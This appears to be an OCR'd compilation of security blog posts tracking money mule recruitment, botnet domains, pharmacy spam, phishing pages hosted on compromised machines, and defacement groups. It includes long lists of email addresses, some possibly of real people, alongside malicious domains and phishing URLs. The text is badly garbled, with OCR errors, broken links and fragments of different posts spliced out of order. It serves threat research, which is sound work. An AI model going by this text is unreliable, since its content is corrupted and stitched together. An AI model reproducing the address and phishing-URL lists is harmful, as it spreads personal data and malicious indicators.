savelij@workmail.com 
kpracas@yahoo.com 
bidon@yopmail.com 
inpetmulu2120@yahoo.co.uk 
925491 @southamericacruises.net 
hahaha28@live.co.uk 
battszggqf@gmail.com 
adimineen@gmail.com 
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isaacbrown4@yahoo.com 
orendalvov@yandex.ru 
dreamplord@yahoo.com 
hiding@yahoo.com 
kcwbOx@live.com 
WatkinsCorey@gmx.com 
bigbizness@live.fr 
malicja0@o2.pl 
sagapala27@gmail.com 
xqrwlgyr@newmoncler2011.com 
zh.a.n.pa633.17.7@gmail.com 
andhuseprathama@yahoo.com 
oscaryoun@yahoo.com 
v.i.t.c.00.per.f.|\@gmail.com 
killamanila85@hotmail.com 
cewkz@abonc.com 
bakeobentee72@mail.ru 
djobf@yahoo.fr 
ilikepiel1123@aim.com 
zehdi@live.fr 
sadasdas@hotmail.com 
primatekug@gmail.com 
gee4realbiz@yahoo.com 
diamond _geezer11@yahoo.co.uk 
myonlineorders1995@yahoo.com 
uucliopr@wegwerfemail.de 
kimcheechef@gmail.com 
fgtfvcfdhd@gmail.com 
alexsoftdir@gmail.com 
sslioux514pp@gmail.com 
hommin2012@gmail.com 
alleat2020@runbox.com 
Cabatrord@aol.com 
cachito@yopmail.com 


scaming@live.fr 
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cygdbueu.m@gmail.com 
zs7zr3erekK@gmail.com 
prostroitel@gmail.com 
noway34270@gmail.com 
freshone946@yahoo.com 

axe _xor@yahoo.com 
icgccentralgospelchurch@yahoo.com 
marekkinolski@gmail.com 
shizhiyong2012@yahoo.cn 

wild one78@ymail.com 
wenceslao.bogdel@gmail.com 
arthritisok@gmail.com 
masere.muchunul@googlemail.com 
Euge.nioDomanski81@gmail.com 
Jens _r123@hotmail.se 
tankdoorwlyej@gmail.com 
braedon818@gmail.com 
ucafefl16@gmail.com 
ireneKi@aol.com 
maciejmilowkis@gmail.com 
kimmcan@yahoo.com 
orermaesomohg@websitebooty.com 
comicaluik@gmail.com 
chantellzszjsho@gmx.com 
stationmasterfsrhlofet@gmail.com 
cheatss@hotmail.com 
dadofbad2001@newonesite.com 
gfdhkjoxcb12@aol.com 
ghrapciti@outlook.com 
myorder@trash-mail.com 
joannfitcher@gmail.com 
statelydfr@gmail.com 
eddgte.nail@gmail.com 
danbrownalu2013@yahoo.com 
samjokgol@gmail.com 

14280 


janssen10 _bautista@yahoo.com 
fZUFGi@mail.ru 
howmuch7@buygolfmall.com 
123561@gmail.com 
envy95673@hotmail.com 
uwiquyrdese@hotmail.com 
ponferradarodolfo@gmail.com 
vartigazi@yahoo.com 
churchilluranta@ymail.com 
judyhyes@hotmail.com 
BurlSturi@fmailxc.com.com 
bolkriep@hotmail.com 
anulass24@gmail.com 
investmentfgde@mail.ru 
lerypazy@hotmail.com 
selmahi69@all4mail.cn.pn 
w.ayneabrandt.b.eg@gmail.com 
p.at.ri.c.ia.fe.ke.tel110@gmail.com 
dhsuiahdjk@yeah.net 
optimusgreatfullded@gmail.com 
criley232@gmail.com 
jokxcvx@yahoo.com 
chaitfqb@hotmail.com 
leozinn96@hotmail.com 
orphanks@hotmail.co.uk 
akbroktvsl16@gmail.com 
maxeylcnie@hotmail.com 
vcvbd@yahoo.com 
wodewangzhan4@hotmail.com 
kutas22@hotmail.com 
Igtwebi@hotmail.com 
711@yahoo.fr 
tianyuan029@gmail.com 
fFluipleutilky12322@mbtshoes32.com 


persiaom|x@hotmail.com 
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greencoryon.hlI@gmail.com 
xiaol.ingdmin@gmail.com 
f.gdf.g.f.03.2@gmail.com 
login972@live.fr 

riicardo _rdm@hotmail.com 
janoe.0607@gmail.com 
jackpown0001@gmail.com 
raneefkmv@hotmail.com 
hntxmyre391@hotmail.com 
lovivihack@gmail.com 

razvan denn@yahoo.com 
a.r.duou.swzhr@gmail.com 
american _orb@yahoo.com 
westveerclem@hotmail.com 
johntimms22@hotmail.com 
r.oo.sterhmdt@gmail.com 
rebelmouse2@customizedfatlossreviews.info 
lbingeffw@cheapsnowbootsus.com 
lannffdy0820120@hotmail.com 
co.nfir.mxodh@gmail.com 
lanejgnoz@hotmail.com 
wurau0070@outlook.com 
Kenfreshmagic2@gmail.com 
m.ybagsbu. y.t.o.ch.an.el@gmail.com 
weezy999@mail.ru 

world shipper@yahoo.com 
d.a.sd12.d.c.w.s2w.3.r.2.3ce.e@gmail.com 
wyattiw4ocu@hotmail.com 
fwyrmtpoei@gmail.com 
dredger888@mail.ru 
sprousester@hotmail.com 
o.nlyanh.1.046@gmail.com 
jamescole121@yahoo.com 
terryjames200@yahoo.com 
pinacrofton@hotmail.com 
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missjohnneban@aol.com 
everette6698@yahoo.com 
daisiaupdegr@hotmail.com 
tzy3406@gmail.com 
atmosv@yandex.ru 
ygeovcr@fremails.com 
rkhtutm@efremails.com 
rmyjuql@dfremails.com 
zxcv@yahoo.com 
vartotojas40@gmail.com 
ozymozykozy@yandex.com.tr 
10101|0@mailinator.com 
richardtuby@yandex.ru 
jpsspatx1162@hotmail.com 
mehedi.hasan150@gmail.com 
legendman1963@yahoo.com 
reynawku@hotmail.com 
Thiscrund32@jourrapide.com 
lloyd202@live.com 
hilesdray@hotmail.com 
apuzup@gmail.com 
megawattsjxul@gmail.com 
ibnu.sporty@gmail.com 
charlesmalnn@gmail.com 
tracissca@hotmail.com 
kussmon@libero. it 
emerymsd@hotmail.com 
justin.jontik@gmail.com 
bartyjcq@hotmail.com 
fuchsnjjr@hotmail.com 
iegieziesi@fastmailforyou.net 
ixffvne@ebobat.net 
brunofon@gugoumail.com 
wi.nceb.r.i.l.tolf@gmail.com 


gjabeufk@gmail.com 
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gjzylfdm@gmail.com 
win.c.ebr.iltolf@gmail.com 
a3035625@drdrb.net 
JacquiCarringtonyd@aol.com 
fanaticalvbui@gmail.com 
pipe.li.n.eg.tw.p@gmail.com 
beadsonline33@hotmail.com 
furihouse@gmail.com 
j.algj.l.d.s.k.gj.Ika.s.g.i.12@gmail.com 
xj.qg.t.ap.Awmhqx@gmail.com 
pip.e.lin.e.g.tw.p@gmail.com 
DRM@gmail.com 
hesbaldib@hotmail.com 
islinskilu@hotmail.com 
courtxjlv@hotmail.com 
joannehartigantei@aol.com 
eegheeyuhi@fastmailforyou.net 
oftdkhflz@aol.com 
win.ce.b.rilt.ol.f@gmail.com 
g.li.bfootw.dhI@gmail.com 
ummjcbgzv@aol.com 
alicebrown28@yahoo.com 
pi.ckleodecgi.bu@gmail.com 
boastfulnvcp@gmail.com 
fxvxb2q3@mail.ru 
johnkelvin973@yahoo.com 
shiftingdge@hotmail.com 
guiseunftw@hotmail.com 
neronr112@gmail.com 
gengitkhan@gmail.com 
Dope@aol.com 
kticloyfw@a6522218.hostink.ru 
crewsmartnet@gmail.com 
hola _935@hotmail.com 
30@vubum.com 
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aakashrawat95@hotmail.com 
mmxsky@163.com 
hyp.oth.es.i.sy.Irsnq@gmail.com 
blahblahblah8715@gmail.com 
jaycoldworld3@hotmail.com 
mass.doing.5@gmail.com 
giatudivangm@yahoo.com 
baybaysaybay@yahoo.com.vn 
adnanyananda@gmail.com 
d.e.fi.ni.tejnybj..\@gmail.com 
o.bje.ctprf.p.f.d@gmail.com 
katibellsemail@gmail.com 
wmrscztct@gmail.com 
besnaultdavid568@yahoo.fr 
businessdiga@yahoo.fr 
Ajif@mailnesia.com 


Artaa _sweet@outlook.com 


blahonshdynblahonshd@gmail.com 


s.p.ec.i.esfwdj.d.m@gmail.com 
a.s.t.ro.n.au.t.jgehc.q@gmail.com 
greenmeanteal23@gmail.com 
cheapmonclereu@gmail.com 
rain.bo.wdwe.b.go@gmail.com 
workitl139@yahoo.ca 
kanyunjzbval1@callidllc.com 
plan691@gmail.com 
billrusnock@gmail.com 
rushpages@gmail.com 
Harnwatt86@gmail.com 
bhiezay-digitalocean@yahoo.com 
carlos.ordunal991@gmail.com 
nicolekl@mail.ru 
plo4evaa@gmail.com 
xqhlOuO@hotmail.com 


kuntilanak43@gmail.com 
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mopure@dron.mooo.com 
greentrooper79@gmail.com 
colocolobeauty@yahoo.com 
f.e.i.z0.n.g.t.0.n.g2.1.3.456.7@gmail.com 
chivas _rr95@hotmail.com 
pryncechambers@gmail.com 
bardhisimo@gmail.com 
lokoserver2009@hotmail.com 
fresh.instock@yahoo.com 
h.u.h.u.1.iu1.23.4.5.6@gmail.com 
c3075570@trbvm.com 
jhichem5@gmail.com 
h.uhuliu123.4.56@gmail.com 
huh.ul.i.u12.34.56@gmail.com 
h.u.h.uliu.12.34.56@gmail.com 
h.u.h.u.1.iul234.56@gmail.com 
dery2333@yahoo.com 
subwOr@hotmail.com 
andrewmalaga@openmailbox.org 
Daveon50@yahoo.com 
hu.hu.li.u.1.23.456@gmail.com 
carlosy2j24@gmail.com 
acukol4@yahoo.com 
rpeduardito@gmail.com 
mantap.aldy@yahoo.com 
h.uh.ul.i.u.1.234.56@gmail.com 
h.u.h.u.li.u.1.234.56@gmail.com 
markw0145@gmail.com 
olukoyakeneth@yahoo.com 
nikil702@safe-mail.net 
guelagli.oussama@sfr.fr 
h.uh.u.l.i.u.12.3.4.56@gmail.com 
supidisupz@outlook.com 
alpanoja@gmail.com 
Manu5571@hotmail.com 

14286 


Savagesteven155@gmail.com 
jeffdotbiz@gmail.com 
Stefic@hotmail.com 
h.uhul.i.u1.2.3.45.6@gmail.com 
adri_chainz _trisapta@yahoo.com 
e€1058159@trbvm.com 

kristoffer laukamp@hotmail.com 
noa.mi@hotmail.com 
EFifor5238@teleworm.us 
shanikokid@gmail.com 
jimmyneutron@mt2014.com 
defunitewd@hotmail.com 
simokonk@gmail.com 
lapinousaure@hotmail.com 
Rowselljasonuk@hotmail.com 
blahblahblah1212@gmail.com 
darkh4xx0rZ@gmail.com 


Stay tuned! 


1. https://1.bp.blogspot .com/-Gckj9-N_sTE/YEcDEIWkdSI/AAAAAAAAL90/MrW6nWWK_CImwzdaxOuof-qP02AezjXSwCLcBGAsYHQ 
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How site works? 


1. Post and track your vacancies, RFPs and projects 
2. Find affordable freelancers or full-time staff 
3. Get work done below budget and make profit 


Welcome to the world of Outsourcing 


In today's world, companies are under constant pressure arising frorn the market Only those who strive to Authorization 


lower their cost of operations while maintaining quality of goods and services are able to survive. One of the Enter to partners area 


most common and nowadays most modern way of inc feasing quality productions with lower expenses is u _ [SS 
in * 

outsourcing 09) 

KINGDOM INNOVATIVE TECHNOLOGIES LTD is the oriline services marketplace in United Kingdom, USA Password:* ee) °° | 


and Maly Our goal is to empower businesses with the absolute freedom of choice as where to outsource he 
business needs to maximize the competitive advantage. We believe that money saved due to outsourcing 
can be effectively and successfully utilized to focus more on strategic and core businesses functions 


Registration Forgot password? 


Dear blog readers, 


| wanted to take the time and effort and present one of the most comprehensive and publicly 
accessible portfolio of currently active money mule recruitment domains for the purpose of 
assisting U.S Law Enforcement and the U.S Intelligence Community on its way to track down 
and prosecute the cybercriminals behind these campaigns. 


In this post I’ll provide actionable intelligence on what appears to be one of the most com- 
prehensive and extensive publicly accessible portfolio of money mule recruitment domains 
associated email addresses and their responding IPs including related pharmaceutical scam 
domains that were active at the time. 


Sample domains known to have been actively involved in money mule recruitment scams: 
http://wdprs.internic.net 
http://enterprisetechinc.com 
http://enterprise-techinc.cc 
http://enterprisetechinc.net 
http://infotech-xpert.com 
http://uk-infotech-xpert.net 
http://infotech-xpert-uk.org 
http://bstrategic.biz 
http://strategic-inc.net 
http://usstrategic-inc.com 


http://king-innovative.com 
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http://king-innovative.net 
http://king-inntech.org 
http://liverinvestiments-Itd.com 
http://liverinvestiments-Itd.net 
http://liverinvestiments-Itd.org 
http://mancapconsulting-ltd.biz 
http://mancapconsulting-Itd.com 
http://mancapconsultingltd.com 
http://newyork-finance.net 
http://nycfinanceinc.com 
http://new-york-finance. biz 
http://stockholderzzz.com 
http://stock-holderz-uk.org 
http://uk-stock-holderz.net 
http://stockfordslimited.com 
http://stockfordslimited.net 
http://stroutsourcing. biz 
http://stroutsourcing.com 
http://stroutsourcing.net 
http://tradeglobe-Itd.biz 
http://tradeglobe-Itd.com 
http://tradeglobe-Itd.net 
http://worldwideinvestment-uk. biz 
http://worldwide-investment.com 
http://worldwide-investmentuk.net 
http://usa-zonecapital.com 
http://zone-capital-usa.net 
http://zonecapitalinc.biz 
http://www.greenolivs.com 
http://domainhelp.opensrs.net 
http://tucowsdomains.com 
http://www.wentsonjobs.com 
http://www.melbourneit.com.au 
http://wdrprs.internic.net 
akgwihuhmahrvx2tmuctunaspftebhxonbtmtmr3vdpz.ly 
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http://advanced-techinc.cc 
http://advanced-techinc.net 
http://advanced-techinc.org 
http://artari-uk.com 
http://art-yard-Itd.net 
http://art-yard-ltd.org 
http://benkroft-italia. biz 
http://benkroft-italia.com 
http://benkroft-italia.net 
http://capital-business-systems. biz 
http://capitalbusiness-systems.com 
http://us-capital-business.net 
http://consolidated-holdingsuk.com 
http://countrywide-financial-usa.biz 
http://country-wide-financialusa.com 
http://usa-countrywide-financial.net 
http://fof-services.org 
http://fof-services.net 
http://finmarintitd.cc 
http://finmarint-Itd.com 
http://finmarint-Itd.net 
http://highland-holdings-ltd.com 
http://internetresources-us.biz 
http://internetresources-us.com 
http://internetresources-us.net 
http://interprolimited.net 
http://itg-solutions-Itd.org 
http://it-merge-Itd.com 
http://it-merge.net 
http://itprofessionals-group.com 
http://itprofessionals-group.net 
http://jtsolutionsinc. biz 
http://jtsolutions-inc.com 
http://jtsolutionsinc.net 
http://labbarra-holdings.com 
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http://labbarra-holdingsuk.net 
http://national-express-holdings. biz 
http://national-express-holdingsuk.net 
http://neopro-inc.biz 
http://premier-group-ltd.com 
http://premier-group-ltd.net 
http://premier-group-ltd.org 
http://primary-international.com 
http://seicoservizi.biz 
http://seicoservizi.com 


http://seicoservizi.net 


http://systems-and-communications.com 


http://systems-and-communications.net 


http://ukpower-Itd.net 
http://us-internationalgroup.biz 
http://us-internationalgroup.com 
http://wirelessgenerationinc. biz 
http://wirelessgenerationinc.net 
http://zeroconsultingsrl.biz 
http://zeroconsultingsrl.cc 
http://zeroconsultingsrl.com 
http://ac-shippingllc.com 
http://ac-shippingllc.org 
http://baltic-shippingexpress.com 
http://baltic-shippingexpress.org 
http://brandnewshippinginc.biz 
http://brandnewshippinginc.net 
http://business-shipping.biz 
http://business-shipping.net 
http://dft-shipment. biz 
http://dft-shipment.net 
http://expresshipping.org 
http://rickolexpresshipping.com 
http://fastlaneshipping.net 
http://firstchoice-inc. biz 
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http://firstchoice-inc.net 
http://flyhigh-inc. biz 
http://flyhigh-inc.net 
http://www.globalconnect-inc. biz 
http://globeshippinginc.biz 
http://globeshippinginc.net 
http://modern-shipping.biz 
http://modern-shipping.net 
http://parcelzoneinc.biz 
http://parcelzoneinc.net 
http://postexpressinc. biz 
http://postexpressinc.net 
http://rexship-llc. biz 

http://rexship-llc.net 
http://shiplandllc. biz 
http://shiplandllc.net 
http://skylineinc-inc. biz 
http://skylineinc-inc.net 
http://topchoiceshippinginc.net 
http://topchoiceshippinginc.biz 
http://useushippinginc.com 
http://useushippinginc.net 
http://usparcelservice. biz 
http://usparcelservice.org 

http://www. it-merge-Itd.com 

http://www. global-techsolution.net 
http://www. webforwardingservice.com 
http://www.countrywide-financial-usa.biz 
http://www.advanced-techinc.cc 
http://www.internetresources-us. biz 
http://www. itprofessionals-group.com 
http://www.outsource-marketing-us.com 
http://advanced-techinc.cc/company/manage 
http://advanced-techinc.net/company/manage 
http://advanced-techinc.org/company/manage 
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ns2.ns1.ns2.serial43.in 


ns2.ns1.ns4.ns1.ns1.serial43.in 


ns2.ns2.ns1.ns1.serial43.in 

To sum up - these are all of the domains currently active and used for the mal- 
ware/spam/phishing campaigns on behalf of this botnet : 

server52.org 


set45.net 


site83.net 


sid95.com 


shell54.com 


siteid64.com 


setup36.com 


share73.com 


service28.biz 


There are several scenarious related to this particular botnet. Despite that it’s the same piece 
of malware that’s successfully adding new zombies to the infected population, the diversity of 
the campaigns, as well as the fact that for instance share73.com is registered by casta4000 
@ mail.ru and is into the "reklama uslug" business which translates to advertising services, 
in this case spam and phishing emails sending on demand, [6]access to the botnet could be 
either offered on demand, or the service itself performed in a typical [7]managed spamming 
appliance outsourced business model. Are they also vertically integrating in respect to the 
fast-fluxing? Yes they are, since they’re achieving it without the need to [8]hire a managed 
fast-flux provider, which isn’t excluding the possibility that they aren’t in fact one themselves, 
as it’s evident they’ve got the capability to become one. 


. http: //ddanchev. blogspot .com/2008/02/inside-botnets-phishing-activities.htm 


1 
2 
3 

4 
5 

6 

7 
8. - i F 


ttp://ddanchev. blogspot .com/2007/11/managed-fast-flux-provider .htm 
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http://art-yard-ltd.net/company/manage 
http://art-yard-uk.com/company/manage 
http://art-yard-Itd.org/company/manage 
http://artari-uk.com/company/manage 
http://artcolors-Itd.com/company/manage 
http://artcolors-Itd.net/company/manage 
http://artcolors-Itd.org/company/manage 
http://benkroft-italia.biz/company/manage 
http://benkroft-italia.com/company/manage 
http://benkroft-italia.net/company/manage 
http://bestway-solutions.com/company/manage 
http://bestway-solutions.net/company/manage 
http://capital-business-systems.biz/company/manage 
http://capitalbusiness-systems.com/company/manage 
http://us-capital-business.net/company/manage 
http://capitalone-outsourcing.net/company/manage 
http://usacapital-oneoutsourcing.biz/company/manage 
http://usa-capital-one-outsourcing.com/company/manage 
http://countrywide-financial-usa.biz/company/manage 
http://country-wide-financialusa.com/company/manage 
http://usa-countrywide-financial.net/company/manage 
http://equitytech-partners.cc/company/manage 
http://equity-techpartners.com/company/manage 
http://equitytech-partners.net/company/manage 
http://fof-services.org/company/manage 
http://fof-services.net/company/manage 
http://feature-solutionuk.org/company/manage 
http://ukfeature-solutions.com/company/manage 
http://financeheads.com/company/manage 
http://finacial-futures.net/company/manage 
http://finmarintltd.cc/company/manage 
http://finmarint-Itd.com/company/manage 
http://finmarint-Itd.net/company/manage 
http://fintech-inprogram.net/company/manage 
http://fintechin-program.com/company/manage 
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http://fintechin-program.org/company/manage 
http://new-source-unlimited.biz/company/manage 
http://fuelsave-solutionuk.org/company/manage 
http://ukfuelsave-solution.biz/company/manage 
http://ukfuelsave-solution.com/company/manage 
http://global-techsolution.net/company/manage 
http://global-techsolution.biz/company/manage 
http://groupholdings-ltd.biz/company/manage 
http://groupholdings-Itd.com/company/manage 
http://groupholdings-ltd.net/company/manage 
http://it-made-easy-limited.com/company/manage 
http://it-made-easy-Itd.net/company/manage 
http://us-internationalgroup.biz/company/manage 
http://us-internationalgroup.com/company/manage 
http://internetresources-us.biz/company/manage 
http://internetresources-us.com/company/manage 
http://internetresources-us.net/company/manage 
http://it-genies-limited.com/company/manage 
http://it-genies.net/company/manage 
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4.4.15 China’s CERT Annual Security Report - 2007 (2008-04-21 09:15) 
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Every coin has two sides, and while China has long embraced [1]unrestricted warfare and 
[2]people’s information warfare for conducting cyber espionage, China’s networked infras- 
tructure is also under attack, and is logically used as stepping stone to hit others country’s 
infrastructures, thereby contributing to the possibility to engineer cyber warfare tensions. 


A week ago, [3]China’s CERT released their annual security report (in Chinese for the time 
being), outlining the local threatscape with data indicating the increasing efficiency applied by 
Turkish web site defacement groups, in between the logical increases in spam/phishing and 
malware related incidents. Here’s an excerpt from the report : 
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"According CNCERT / CC monitoring found that in 2007 China’s mainland are implanted into 
the host Trojans alarming increase in the number of IP is 22 times last year, the Trojans have 
become the largest Internet hazards. Underground black mature industrial chain for the pro- 
duction and the large number of Trojans wide dissemination provides a very convenient con- 
ditions, Trojan horses on the Internet led to the proliferation of a lot of personal information 
and the privacy of data theft, to the personal reputation and cause serious economic losses; In 
addition, the Trojans also increasingly being used to steal state secrets and secrets of the state 
and enterprises incalculable losses, the Chinese mainland are implanted into the Trojan Horse 
computer controlled source, the majority in China’s Taiwan region, the phenomenon has been 
brought to the agency’s attention. Zombie network is still the basic network attacks 
platform means and resources. 2007 CNCERT / CC sampling found to be infected 
with a zombie monitoring procedures inside and outside the mainframe amounted 
to 6.23 million, of which China’s mainland has 3.62 million IP addresses were im- 
planted zombie mainframe procedures, and more than 10,000 outside the control 
server to China Host mainland control. Zombie networks primarily be used launch denial 
of service (DdoS) attacks, send spam, spread malicious code, as well as theft of the infected 
host of sensitive information, issued by the zombie network flow, distributed DDOS attack is 
recognized in the world problems not only seriously affect the operation of the Internet busi- 
ness, but also a serious threat to China’s Internet infrastructure in the safe operation. 2007 
China’s Internet domain name registration and the use of quantitative rapid growth, reaching 
11.93 million, an annual growth rate of 190.4 percent, while hackers use of domain names has 
become a major tool. Use of domain names, the attackers could be flexible, hidden website 
linked to the implementation of large-scale horse zombie network control, network malicious 
activities such as counterfeiting. Fast-Flux domain names, such as dynamic analysis technolo- 
gies, resulting in accordance with the IP to the attacks more difficult to trace and block; 2007 
domain names which has been in use analytical services for the existence of security flaws, 
the public domain analysis of the server domain hijacking security incidents, a large number 
of users without knowing the circumstances of their fishing lure to the site or sites containing 
malicious code, such incidents very great danger. Therefore, the strengthening of the man- 
agement of domain names and domain names analytic system’s security protection is very 
important." 


6.23 million botnet participating hosts according to their stats, where 3.62 million are Chinese 
IPs is a great example of how the Chinese Internet infrastructure’s getting heavily abused by 
experienced malware and botnet masters, primarily taking advantage of what’s old school 
social engineering, and outdated malware infection techniques, which undoubtedly will work 
given China’s immature and inexperienced from a security perspective emerging Internet 
generation. 
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Getting back to the globalization and efficiency of Turkish web site defacement groups’ world- 
wide web application security audit, indicated in the report, according to China’s CERT these 
are the top 10 defacers, where 7 are well known Turkish ones, and 3 are interestingly Chinese 


sinaritx - 1731 defacements 


1923turk - 1417 defacements 
the freedom - 1156 defacements 


aLpTurkTegin - 1052 defacements 
Mor0Ccan Islam Defenders Team - 864 defacements 


iskorpitx - 761 defacements 
lucifercihan - 525 defacements 
It’s also interesting to see pro-democratic Chinese hackers attacking homeland networks. 
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VIDEO: French senator tells you the truth about Tibet 
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Cyber warfare tensions engineering is only starting to take place, and state sponsored or 
perhaps even tolerated cyber espionage building capabilities in order for the state to later on 
acquire the already developed resources and capabilities in a cost-effective manner. However, 
[4]considering the [5]recent cyber attacks against "Free Tibet" movements, as well as the 
[6]DDoS attack attempts at CNN due to [7]CNN’s coverage of Tibet, Chinese cyber warriors 
continue demonstrating people’s information warfare, and [8]Internet PSYOPs by developing 
an anti-cnn.com (121.52.208.243) community, with some catchy altered images from the 
originals broadcasted worldwide, and with a special section to improve China’s image across 
the world. And logically, there’s a [9]PSYOPs centered malware released in the wild, a sample 
of which is basically embedding links to a non-existent domain, descriptive enough to point to 
TibetisAPartOFChina.com : 


%\CommonDocuments %\My Music\My Playlists\WWW.cgjSFGrz _TibetlsAPartOFChina.cOM 
%CommonDocuments %\My Music\WWW.bimStzno _TibetlsAPartOFChina.COM 
%CommonDocuments %\My Videos\WWW.kUJs _TibetlsAPartOFChina.COM 


%CommonPrograms %\Accessories\Accessibility\WWW.R Sulr _TibetlsAPartOFChina.COM 
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Now that’s effective digital PSYOPs, isn’t it? If you’re visionary enough to tolerate the develop- 
ment of underground communities, whereas ensuring their nationalism level remain a priority 
for anything they do, you end up with a powerful cyber army whose every action perfectly 
fits with your political and military doctrine, without you even bothering to coordinate their 
efforts, thereby eliminating the need for a command and control structure. 
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4.4.16 The Rise of Kosovo Defacement Groups (2008-04-21 11:31) 


eee 


wees 
bee Mee Lote 


OY Acwmtas Web Scamoms (Free Ebtion! 


Name 
ca 


aor fk Peer eeeeeeeee : 
PSSSSSSSSSSSSSSSSSS: 
SESE REE eee eee 


There’s no better way to assess the incident that still haven’t made it into the mainstream 
media, but to violate defacement group’s OPSEC, by obtaining internal metrics for defaced 
sites on behalf of a particular group. According to this screenshot, released by one of the 
members of the Kosovo Hackers Group, a group that’s been defacement beneath the radar as 
of recently, the mass deface included 300 sites, and on the 13th of April, [1]Quebec’s Common 
Ground Alliance site got also defaced by the group. [2]Web application vulnerabilities in a 
[3]combination with SQL injecting web backdoors is what is greatly contributing to the success 
of newly born defacement groups. And of course, [4]commercially obtainable tools as you can 
see one of the bookmarks in the screenshot, indicating the use of such. 
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The rise of this particular group greatly showcases the cyclical pattern of cyber conflicts as 
the extensions of propaganda, PSYOPs and demonstration of power online, most interestingly 
the fact that at the beginning of their capabilities development process, they target everyone, 
everywhere, to later on move to more targeted attacks to greatly improve the effectiveness of 
the PSYOPs motives. 
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[1]Malware authors, phishers and spammers have been actively consolidating for the past 
couple of years, and until they figure out to to vertically integrate and limit the participation 
of other parties in their activities, this development will continue to remain so. [2]Malware 
infected hosts are not getting used as stepping stones these days, for [3]OSINT or [4]cyber 
espionage purposes, but also, for sending and hosting phishing pages, a tactic in which I’m 
seeing an increased interest as of recently. Here are some example of recently spammed 
phishing campaigns hosting the phishing pages on end user’s PCs : 


- pool-71-116-244-232.lsanca.dsl-w.verizon.net 

- user-14203ds.cable.mindspring.com /online.lloydstsb.co.uk/customer.ibc/logon.html 

- user-14203ds.cable.mindspring.com /onlineid/cgi-bin/onlineid.bankofamerica/sso.login.con- 
troller 

-  user-14203ds.cable.mindspring.com = _/halifax-online.co.uk/_  =mem__bin/halifax _Lo- 
gin/formslogin.aspsource=halifaxcouk 

- stolnick-8marta-8b-r1-c1-45.ekb.unitline.ru /halifax-online.co.uk/ mem __bin 

- zUx006-052-125.adsl.green.c h/onlineid/cgi-bin/onlineid.bankofamerica/sso.login.controller 

- rrcs-74-218-5-6.central.biz.rr.com /webview/files//onlineid/cgi-bin/onlineid.bankofamerica/sso.login.con 
troller 

- user-0c93qog.cable.mindspring.com /onlineid/cgi-bin/onlineid.bankofamerica/sso.login.con- 
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troller 


The second tactic that I’ve been researching for a while is that of remotely SQL injecting 
or remotely file including phishing pages on vulnerable sites, as for instance, someone’s 
actively abusing vulnerable sites, which are apparently noticing this malicious activities and 
taking care of their web application vulnerabilities. Some recent examples include : 


- kclmc.org /components/www.halifax.co.uk/_mem_bin/FormsLogin.aspsource=halifaxcouk/Ind 
ex.PHP 


- citrusfsc.org /templates _c/www.halifax-online.co.uk/ _mem _bin/halifax 
_LogIn/formslogin.aspsource=halifaxcouk/index.html 
- agentur-schneckenreither.com /administrator/components/com _joom- 


fish/help/www.halifax.co.uk/ mem _bin/formslogin.asp/index.php 
- dziswesele.pl /media/www.halifax.co.uk/ mem __bin/formslogin.asp/ 


AISFritE o00<-=-=-<- 
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In November, 2007, | started making the connecting between a Turkish defacement group 
that wasn’t just defacing the web sites it was coming across, but was also [5]hosting malware 
on the vulnerable sites : 


" It gets even more interesting, as it appears that a Turkish defacer like the ones [6]l 
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blogged about yesterday is somehow connected with the group behind the recent Possibility 
Media’s Attack, and the Syrian Embassy Hack as some of his IFRAMES are using the exact urls 
in the previous attacks. " 


As of recently, I’m starting to see more such activity, with various defacing groups real- 
izing that monetizing their defacements can indeed improve their revenue streams. For 
instance, findaswap.co.uk/administrator/components/com  _extplorer/www.Halifax.co.uk/ 
_mem __bin/formslogin.asp/ was serving a phishing page, and was also recently [7]hacked by a 
Turkish defacement group. Moreover, equidi.com which is currently defaced is also hosting the 
following phishing pages within its directory structure, namely, equidi.com/New2008/Orange ; 
equidi.com/New2008/www.bankofamerica.com ; equidi.com/New2008/www.halifax.co.uk 


Why are all of these tactics so smart? Mainly because they forward the responsibility to 
the infected party, and | can reasonably argue that a phishing page hosted at a .biz or .info tld 
will get shut down faster than the one hosted at a home user’s PC. As for the SQL injections, the 
RFI, and the consolidation between defacers and phishers if it’s not defacers actually phishing 
for themselves, what we might witness anytime now is a vulnerable financial institutions web 
sites’ hosting phishing page, or its web application vulnerabilities used against itself in a social 
engineering attempt. 
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4.4.18 Ten Signs It’s a Slow News Week (2008-04-21 20:58) 


You know it’s a slow news week when you come across : 

1. Articles starting that malware increased 450 % during the last quarter - of course it’s 
supposed to increase given the automated polymorphism they’ve achieved thereby having 
anti virus vendors spend more money on infrastructure to analyze it 


2. Articles starting that soam and malware attacks will increase and get more sophisti- 
cated - and the sun too, will continue expanding 


3. Articles discussing a new malware spreading around instant messenging networks - 
psst they’re hundreds of them currently spreading 
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http://www.viagrabarato.biz 
http://www.usapharmacyvip.com 
http://www.us-onlinedrug.com 
http://www. levitra-cialis-viagra.org 
http://www.longlovetabs.biz 
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http://www.myworldsearch.org 
http://www. pillgen.info 
http://www.rxedtabs.com 
http://www. viagra-levitra-xenical.com 
http://pennistablets.net 
http://pennispill.net 
http://indiantablets.com 
http://lowestviagraprice.org 
http://magictablets.net 
http://purchaseviagraonline.net 
http://pills.se 
http://rx-reliable-meds.com 
http://cheaplevitra.biz 
http://cheaplevitra.org 
http://www.edantidote.com 
http://ed-medication-pharma.com 
http://buyviagraonline.net 
http://bluegenerics.com 
http://buy-viagra-online-pharmacy-in-canada.info 
http://buyingviagra.name 
http://buylevitrarx.com 
http://edtrusted.com 
http://edmeds.eu 
http://edgrouppills.com 
http://edhealthdirect.com 
http://fastmedhelp.com 
http://salonti.info 
http://viagrauk.biz 
http://viagraonlinebuy.com 
http://xpills.info 

http://www. best-ed-store.com 
http://edselected.info 
http://www.cialisonline.es 
http://www. pharmafr.com 
http://www.generisch-viagra.com 
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4. Articles discussing how signature based malware scanning is dead while an anti virus 
vendor’s ad is rotating on the right side of the article - it’s not dead it’s just getting bypassed 
as a reactive security measure by the bad guys 


5. Articles commenting on an exploit code for a high risk vulnerability made it public - 
it’s been usually circulating around VIP underground forums weeks before it made to the 
mainstream media, with script kiddies leaking it to other script kiddies 


6. Articles pointing out how phishers started targeting a specific company - they target 
them all automatically, so don’t take it personally if it’s your company getting targeted 


7. Article emphasizing on how mobile malware will take over the world, despite that 
there no known outbreaks currently active in the wild - once mobile commerce stars taking 
place in full scale for sure 


8. Articles pointing out that having a firewall and an updated anti virus software is im- 
portant - in times when client side vulnerabilities are serving a new binary on the fly with 
quality assurance applied before the campaign is launched to make sure it will bypass the 
most popular firewalls, things are changing and so must your perspective on what’s important 


